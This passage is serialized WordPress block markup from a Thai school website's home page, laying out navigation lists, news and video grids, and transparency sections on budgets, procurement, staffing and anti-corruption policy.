%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 